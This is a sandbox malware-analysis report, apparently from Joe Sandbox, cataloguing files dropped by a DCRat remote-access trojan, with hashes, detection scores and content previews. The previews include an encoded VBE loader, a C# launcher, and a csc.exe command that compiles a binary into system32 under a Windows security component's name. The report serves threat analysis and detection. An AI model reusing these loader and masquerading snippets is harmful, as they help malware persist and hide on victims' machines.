                                                                                            SHA1:316FA09F467BA90AC34A054DAF2E92E6E2854FF8
                                                                                            SHA-256:065D2B17AD499587DC9DE7EE9ECDA4938B45DA1DF388BC72E6627DFF220F64D2
                                                                                            SHA-512:D5AC72CB065A3CD3CB118A69A2F356314EEED24DCB4880751E1A3683895E66CEDC62607967E29F77A0C27ADF1C9FE0EFD86E804F693F0A63A5B51B0BF0056B5D
                                                                                            Malicious:false
                                                                                            Preview:@echo off..start work.exe -priverdD

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1481861
                                                                                            Entropy (8bit):7.880225299581498
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:qubsnafAPyjZrvoW9jdO1T2qdg+GTjMZpCfJYLw289l2zHTJnNXlvWgcDByH0s/F:cI1voojGT0MCfJ3AzHTlvxKyH0st
                                                                                            MD5:E0A16200BD098799073FCB05E9D31300
                                                                                            SHA1:53D0E506AEAA0515595415016FFD0852EAF3161D
                                                                                            SHA-256:951F1F32E96A9C26DE591FE522CB8A1753858EC6C11A2B2D13EFE81131AAC6BD
                                                                                            SHA-512:C705E91A2AE0C68F1F09AD1CBD6818C8B8D5C63DF02BE1831D45CA73D52DBC7A40DB56206EA116022F226EB1F69437ADD5EABFB2986F02041B0CEA109D6597DC
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 14%
                                                                                            • Antivirus: Virustotal, Detection: 20%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w..w..w..<.V.w..<.T..w..<.U.w....Z.w......w......w......w...$.w...4.w..w..v......w......w....X.w......w..Rich.w..........PE..L......d...............!.....................@....@.......................................@.............................4.......P....`..D....................P...#......T............................f..@............@..x...\... ....................text....-.......................... ..`.rdata......@.......2..............@..@.data...PG..........................@....didat.......P......................@....rsrc...D....`......................@..@.reloc...#...P...$..................@..B................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1154243
                                                                                            Entropy (8bit):5.996523401858512
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:2TbBv5rUyXVG5Tn3PB2empJMA+p3iE0nTLhLDN6O:IBJ+Tn3PB2JmA+p3KThDr
                                                                                            MD5:1C051E7154F24C6BEA5788CBE9DCB478
                                                                                            SHA1:041C55D246B3F2A83378CEA458939EEB9FF7AD71
                                                                                            SHA-256:184EF8BDC393FA03BA5C7655425AE8ABFAC071887E45235B129EC74423FA46D6
                                                                                            SHA-512:949927E32CF2AE9E18D4B6D2D52F17EE0432D6502D8000C5AC99D4ECFF8744BB7CFE919F67A06D4D9DEF3776FF4FF0FA048AA01751F3AB5D1C49A6C178D3965E
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            • Antivirus: Virustotal, Detection: 58%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.0.cs

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):416
                                                                                            Entropy (8bit):5.095758264663025
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LP7GowiFkD:JNVQIbSfhV7TiFkMSfhWLPySFkD
                                                                                            MD5:F63ABFE30BEBC26A884A9EF49DB85F63
                                                                                            SHA1:41D8D945518B9DD766A9320FF25EEBCD12ACE24C
                                                                                            SHA-256:18A670CB7D65A93BEAA565176EBF52D2C29D985CD83A4690A878192261726A2E
                                                                                            SHA-512:5E05C96CC706690464E300D963005E5EB80326263C02D423C8AD7D6C271F433B6450B4C52AB7F990163A533D153CBA36B576E7898FED353C7B9AF197E5E55010
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"); } catch { } }).Start();. }.}.

                                                                                            C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):250
                                                                                            Entropy (8bit):5.120629256027318
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fLZ77:Hu7L//TRq79cQWfF77
                                                                                            MD5:B9433C3BB404F58C4B83A8E985F9E7B7
                                                                                            SHA1:2426F9D2D1E5C8BECABCB8C5A5F13D3D042AD90F
                                                                                            SHA-256:8E8C9E4C61926692312F0EF27B7BCCF1B20F20474937C92B7A26EB94E15A2E57
                                                                                            SHA-512:FF1E518C23FED7E681845A2567D1B291E1044829F0CE276AF029F408CDE2C9244832951C3EF1DC26FC1E2A1FEF40312A6CE79752560793CCEED2F04CD5668D17
                                                                                            Malicious:true
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.out

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):767
                                                                                            Entropy (8bit):5.281824290892456
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:KJrH8oMI/u7L//TRq79cQWfF76KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJoI/un/Vq79tWfcKax5DqBVKVrdFAMb
                                                                                            MD5:916BEEFAE1F31B53CDEE0B51D2162A64
                                                                                            SHA1:BB76DD50C8C54599B5A92130E1517551C8EECC6A
                                                                                            SHA-256:B63E041B00C1339300CB33B325438381AB5F3879CB70CBC65D978746ECBD19A4
                                                                                            SHA-512:D7651CD94CAD754CE6A731928F7FE52E803F6949D6FA31368A1A4CAA9C844294CB030F82741AC809185ACAEF1162A664DB16B6E13872EF46E6C4C0ACE95FFEF1
                                                                                            Malicious:false
                                                                                            Preview:.C:\Users\user\AppData\Roaming\msBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\AppData\Local\Temp\lxBmhx8hqP

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.0536606896881855
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:xVvGrIaT4/:Tuy
                                                                                            MD5:25F40F423058EE0AC0505BCAC8A725C3
                                                                                            SHA1:407A5224A6C2F548F26E3B4AABC3037C49371459
                                                                                            SHA-256:BCC0950C9B4C8FF60B654B7644E28DAA69E9746448E7DAFE87D1D8D036325D99
                                                                                            SHA-512:E07606D31C788501BE26BC0AE28B4FCAD5D8D6BE4370054CD006741C0A41BA74261003154BD991756DD884FDB44BDA8E673CFE97E8230ABBF1D8CC7DA0E032C5
                                                                                            Malicious:false
                                                                                            Preview:eqpUpOkLqJimKremTGwLnRiLZ

                                                                                            C:\Users\user\AppData\Roaming\msBroker\2df7ee17dc0323

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):53
                                                                                            Entropy (8bit):4.958960313012944
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:4RXb0wC11V5wBsK:EXvC11zwBsK
                                                                                            MD5:4E043FFFFDB2B1885FFF43306F36FC76
                                                                                            SHA1:A06CE5B46CB37C5B53F0DF002EFD597FC602299A
                                                                                            SHA-256:7C632992388DF5DC2263B849F18383C1A1059D90DD2BFB816C2D47744A0F1FEB
                                                                                            SHA-512:BB798D246E38A476D9C42D17E10FA509360E5FCCBFD3C20818FCB4AE1E769D9CB84B50C62633003F77603733000DD5E570D355A9D3394BB40361C54BB07792AB
                                                                                            Malicious:false
                                                                                            Preview:oD6PT08EWvxcyJ0rsMHMHGheP2DxtpGmr9BfyeXCadxkojoo7pDDE

                                                                                            C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):89
                                                                                            Entropy (8bit):5.028900217814621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:lvjHaI82Y76Bhcs0J4A+Q0dAHAxy:lvj5Y7egJYQ0pU
                                                                                            MD5:9BCDE4CA07A1952CA814C0667664D681
                                                                                            SHA1:5AC886D95FF5ECE7B49C3B6F064BC33AFE4EADBF
                                                                                            SHA-256:590CF9245C860D725EB2716D2F12E8EE2585BFE8D03DF2BD1CAE8622A11CD402
                                                                                            SHA-512:ED27D239D148F0BFDC8047EB7BB8C088AD5D252A1595D23FC459F30D7C7698EC05F15F34769E1EE270773733B2CA35E421B99FF7DDF799E7E8876DBBBFE02ADA
                                                                                            Malicious:false
                                                                                            Preview:%SLJznYshrpgXUrd%%pBqQ%..%sqROZRstwQEVk%"%AppData%\msBroker/SurrogatewebSession.exe"%xVH%

                                                                                            C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                            C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):223
                                                                                            Entropy (8bit):5.872095737203739
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GXkgwqK+NkLzWbHZEG8nZNDd3RL1wQJRZ7vtSwKL3JNj:GXkBMCzWL6G4d3XBJr7vtcj
                                                                                            MD5:FBE6F760CA876D530840FBF855628A92
                                                                                            SHA1:9C7FAAA6A666703B0D5A241106CBE42E84683142
                                                                                            SHA-256:8D717BCD2FACA0E8D2765DB69DD401D363BBD3BE007313BF3A107FBC2FB3C8E6
                                                                                            SHA-512:1B6564F56D53017741009BB809CAD3364A29A67F55E5E03473728D4DE9F42F1F0C9DF7AC130D5D27B0B2088A2B64501A6680F3358CE029108B0661A0DD444A43
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zs/~.W0+.zJ sPlSCyuW6HZ8C/nTyjDdS%0w/q9_4R(lOEBP!S~6ls/.Iz4AAA==^#~@.

                                                                                            C:\Users\user\Desktop\BudDliLc.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            • Antivirus: Virustotal, Detection: 20%, Browse
                                                                                            Joe Sandbox View:
                                                                                            • Filename: ZT3pxe2Tb4.exe, Detection: malicious, Browse
                                                                                            • Filename: O5OjRoFGIW.exe, Detection: malicious, Browse
                                                                                            • Filename: iY40ylvr5y.exe, Detection: malicious, Browse
                                                                                            • Filename: 7GTGpZi6oi.exe, Detection: malicious, Browse
                                                                                            • Filename: GWCscceJsW.exe, Detection: malicious, Browse
                                                                                            • Filename: QHZoYVBjSD.exe, Detection: malicious, Browse
                                                                                            • Filename: qObijSd3Uj.exe, Detection: malicious, Browse
                                                                                            • Filename: 2EHDj2G1ow.exe, Detection: malicious, Browse
                                                                                            • Filename: UU5WXfH85a.exe, Detection: malicious, Browse
                                                                                            • Filename: k6AIKkidxG.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                            C:\Users\user\Desktop\LdxTVLQK.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 67%
                                                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                            C:\Users\user\Desktop\MFrsFgjH.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 67%
                                                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                            C:\Users\user\Desktop\RAtJMMZA.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                                            • Antivirus: Virustotal, Detection: 25%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\TDfrhvdw.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            • Antivirus: Virustotal, Detection: 10%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\WslZMRrk.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                                            • Antivirus: Virustotal, Detection: 25%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\aEtIhTbg.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            • Antivirus: Virustotal, Detection: 10%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\lKwWBiIK.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):9728
                                                                                            Entropy (8bit):5.0168086460579095
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                            MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                            SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                            SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                            SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                            Malicious:true
